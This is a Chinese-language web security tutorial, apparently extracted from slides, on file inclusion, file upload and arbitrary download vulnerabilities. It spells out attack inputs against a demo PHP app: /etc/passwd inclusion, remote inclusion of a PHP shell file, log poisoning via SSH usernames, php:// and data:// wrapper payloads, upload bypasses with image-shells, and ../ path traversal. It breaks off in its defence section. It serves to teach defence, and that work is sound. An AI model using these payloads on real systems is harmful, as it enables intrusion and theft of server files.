Web安全概述從漏洞分析到防御實踐目錄01文件包含漏洞02文件上傳漏洞03文件下載漏洞04漏洞防御總結(jié)05致謝文件包含漏洞概述文件包含漏洞定義開發(fā)人員為提高效率封裝重復(fù)代碼，未校驗引用源導(dǎo)致漏洞攻擊者構(gòu)造惡意路徑包含本地/遠(yuǎn)程文件，引發(fā)敏感信息泄露或代碼執(zhí)行PHP包含函數(shù)include/include_once：警告不終止require/require_once：錯誤終止執(zhí)行漏洞分類本地文件包含（LFI）：利用服務(wù)器本地文件遠(yuǎn)程文件包含（RFI）：利用外部服務(wù)器文件（需配置allow_url_include=On）本地文件包含攻擊演示攻擊示例代碼示例：fileinc.php接收filename參數(shù)并include訪問/etc/passwd：/bcbm/fileinc.php?filename=/etc/passwd訪問Apache配置：/bcbm/fileinc.php?filename=/opt/lampp/etc/httpd.conf訪問日志文件：/bcbm/fileinc.php?filename=/opt/lampp/logs/access_log遠(yuǎn)程文件包含攻擊演示攻擊條件PHP配置allow_url_include=On（默認(rèn)Off）攻擊步驟1攻擊者服務(wù)器準(zhǔn)備shell.txt：<?phpeval(phpinfo());?>2遠(yuǎn)程包含：/bcbm/fileinc.php?filename=6/learn/shell.txt3執(zhí)行結(jié)果：獲取被攻擊服務(wù)器PHP環(huán)境信息日志文件包含攻擊攻擊前提日志可讀、路徑可知、存在文件包含漏洞攻擊方法Web日志攻擊1.BurpSuite攔截請求，寫入惡意代碼到access_log2.包含日志：/bcbm/fileinc.php?filename=/opt/lampp/logs/access_log系統(tǒng)日志攻擊1.SSH登錄時用戶名輸入<?phpphpinfo();?>2.包含/var/log/secure：/bcbm/fileinc.php?filename=/var/log/securePHP偽協(xié)議文件包含常用偽協(xié)議php://?lter：讀取源碼（base64編碼）/bcbm/fileinc.php?filename=php://filter/read/convert.base64-encode/resource=common.phpphp://input：執(zhí)行POST數(shù)據(jù)中的代碼phar://：包含壓縮文件內(nèi)的代碼（支持重命名為.jpg）data://：直接嵌入代碼/bcbm/fileinc.php?filename=data://text/plain,文件上傳漏洞概述漏洞定義用戶上傳WebShell等惡意文件，導(dǎo)致服務(wù)器被控制檢測方式1.前端JS驗證：檢查擴展名2.后端Content-Type校驗：判斷文件類型3.后端擴展名校驗：限制允許的擴展名4.后端文件頭校驗：檢查文件簽名（如PNG頭89504E47）文件上傳繞過攻擊前端檢測繞過BurpSuite攔截修改擴展名：將test.php改為test.jpg上傳，攔截后改回.phpContent-Type繞過攔截請求修改Content-Type為image/jpeg擴展名繞過上傳test.php.abcd，Apache從右向左解析執(zhí)行.php文件頭繞過制作圖片馬：copyh.jpg/b+test.php/apt.jpg，配合文件包含執(zhí)行文件下載漏洞分析漏洞定義未驗證下載請求，攻擊者下載任意文件或遍歷路徑攻擊示例正常下載：/bcbm/download.php?filename=pt.jpg路徑遍歷：/bcbm/download.php?filename=../../../../../etc/passwd原理解析代碼未過濾../，導(dǎo)致路徑跳轉(zhuǎn)$file_path="upload/{$_GET['filename']}"漏洞防御總結(jié)文件包含防御關(guān)閉allow_url_include/allow_url_fopen白名單限制可包含文件限制文件訪問目錄（ope